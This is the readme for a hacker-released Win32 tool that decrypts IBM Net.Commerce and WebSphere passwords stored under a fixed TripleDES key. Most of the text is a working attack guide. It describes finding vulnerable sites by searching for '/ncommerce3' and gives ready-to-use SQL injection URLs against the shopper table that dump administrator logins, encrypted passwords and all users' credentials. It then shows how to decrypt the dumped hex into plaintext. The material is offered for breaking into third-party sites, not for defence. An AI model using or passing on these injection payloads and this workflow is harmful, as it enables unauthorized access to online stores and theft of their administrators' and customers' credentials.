SUQ.DIQ version 1.00 by xor37h and darkman of SMERSH Danish Design Description: A Win32 application, developed in assembly, for encrypting and decrypting passwords from IBM Net.Commerce, WebSphere and possibly other IBM and Lotus applications aswell. IBM Net.Commerce and WebSphere use TripleDES to encrypt the passwords, but instead of encrypting a string with the password as key, IBM encrypts the password using a fixed key. The user can change the default key while installing IBM Net.Commerce and WebSphere in advanced mode. But since it complicate things changing the key, we don't expect this to be a common sight. In case you do stumble upon a site, using a different key and you're able to locate the key, cut&paste it in to the "Key" field in SUQ.DIQ and you'll be able to decrypt those passwords aswell. It's very easy locating sites running IBM Net.Commerce or WebSphere, just go to your favourite search engine (whether it's www.google.com, www.altavista.com, www.yahoo.com or any other search engine) and search for "/ncommerce3" without the quotes. Lets imagine you found a site named www.suq.diq.net with Net.Commerce or WebSphere installed, if you want to get a list of all the system administrator usernames, you should type the following in the URL: http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shshtyp+%3d+'A'; You'd see a HTML page looking a bit like this: TELL ME ABOUT THIS PAGE ------------------- MALL STORE NAME ------------------- Order Details: ncadmin Order Details: xor37h Order Details: darkman Database Error: A database error occurred. Please contact the merchant server administrator. SQL Error Code = -421 If you want to get the encrypted password for a specific username, you should type the following in the URL: http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlpswd+as+mestname,0+from+shopper+where+shlogid+%3d+'ncadmin'; The above line will get you the password for the: ncadmin account, which is a system administrator account much like root is at systems running UNIX. You'll see a HTML page looking a bit like this: TELL ME ABOUT THIS PAGE ------------------- MALL STORE NAME ------------------- Order Details: 2F6E44796F72576B424A633D2020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020 Database Error: A database error occurred. Please contact the merchant server administrator. SQL Error Code = -421 Then you fire up the SUQ.DIQ application, cut&paste the long hex number from the browser to the "Input password" field in the SUQ.DIQ application, you don't have to copy it all of the long hex number, only till the '20's, in this case it's "2F6E44796F72576B424A633D". And then you press OK and SUQ.DIQ will decrypt the encrypted password and show you the plain text password in the "output password" field, which in this case is: "SUQ.DIQ", without the quotes. Below is a couple of SQL calls you might find usefull aswell: Will show a list of all the usernames: http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+shlogid+as+mestname,0+from+shopper+where+shlpswd+is+not+null; Will show a list of all the usernames and passwords: http://www.suq.diq.net/cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?order_rn=99999+union+select+CHAR(shlogid)||HEX(shlpswd)+as+mestname,0+from+shopper+where+shlpswd+is+not+null; MSVCRT.DLL is required to run this application. To increase the enjoyment of this application we included nc3.pl, An IBM net.commerce/websphere user/password scanner, made by antistar, thank you very much. We'd like to thank B0z0, Painter6 and Ratter for either helping us or trying to help us. Furthmore we'd like to thank Rudi Carell for publishing the information regarding how to query data through the macros. If you're interested in the source code or want to get in touch with us, please contact us at: suqdiq@hotpop.com